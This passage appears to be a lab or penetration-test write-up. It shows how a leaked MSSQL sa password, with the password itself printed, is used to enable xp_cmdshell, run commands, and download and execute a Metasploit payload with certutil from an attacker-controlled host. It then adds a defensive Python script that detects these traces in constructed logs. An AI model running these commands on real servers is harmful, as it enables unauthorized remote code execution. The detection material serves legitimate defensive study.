Exploitation
After getting the credentials for the MSSQL Server I got remote code execution.
Creds: sa:EjectFrailtyThorn425
sqsh -S victim-ip -U sa -P password
exec sp_configure 'xp_cmdshell', 1
go
EXEC SP_CONFIGURE 'xp_cmdshell', 1
reconfigure
go
xp_cmdshell whoami
go
output
weoweo\wewo
Then I did something along the lines of:
xp_cmdshell "certutil -urlcache -f http://myip:myport/msf.exe msf.exe"
go
then
xp_cmdshell 'cmd /c msf.exe'
go
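From the defender's side, the steps above leave three traces: the sp_configure change in the SQL Server errorlog, a shell started by sqlservr.exe, and a certutil -urlcache download. The following is an added example, not part of the original notes, that checks for all three; the log lines, process records, paths, addresses and function names are constructed for illustration.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

# Constructed sample data, not taken from the original page.
ERRORLOG = [
    "2024-01-10 09:14:02.30 spid55 Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.",
    "2024-01-10 09:20:41.87 spid12 Configuration option 'max server memory (MB)' changed from 4096 to 8192. Run the RECONFIGURE statement to install.",
    "2024-01-10 09:31:07.02 spid55 Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.",
]
# Process-creation records: (parent image, image, command line).
PROCESSES = [
    (r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe",
     r"C:\Windows\System32\cmd.exe", r'"C:\Windows\system32\cmd.exe" /c whoami'),
    (r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\certutil.exe",
     "certutil -urlcache -f http://203.0.113.5:8000/tool.exe tool.exe"),
    (r"C:\Windows\explorer.exe", r"C:\Windows\System32\certutil.exe",
     "certutil -hashfile report.pdf SHA256"),
]

OPTION_RE = re.compile(
    r"Configuration option 'xp_cmdshell' changed from (\d+) to (\d+)", re.I)
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

def xp_cmdshell_enabled(lines):
    """Errorlog lines where xp_cmdshell was switched on (new value 1)."""
    hits = []
    for line in lines:
        m = OPTION_RE.search(line)
        if m and m.group(2) == "1":
            hits.append(line)
    return hits

def shells_from_sql_server(events):
    """Shell processes whose parent is the SQL Server service binary."""
    return [e for e in events
            if basename(e[0]).lower() == "sqlservr.exe"
            and basename(e[1]).lower() in SHELLS]

def certutil_downloads(events):
    """certutil runs that use -urlcache (or /urlcache) to fetch a file."""
    return [e for e in events
            if basename(e[1]).lower() == "certutil.exe"
            and re.search(r"[-/]urlcache\b", e[2], re.I)]

if __name__ == "__main__":
    for name, hits in [("xp_cmdshell enabled", xp_cmdshell_enabled(ERRORLOG)),
                       ("shell spawned by sqlservr.exe", shells_from_sql_server(PROCESSES)),
                       ("certutil download", certutil_downloads(PROCESSES))]:
        for h in hits:
            print(f"[ALERT] {name}: {h}")
```

The parent-process check is the strongest of the three, since a database engine rarely has a legitimate reason to start cmd.exe.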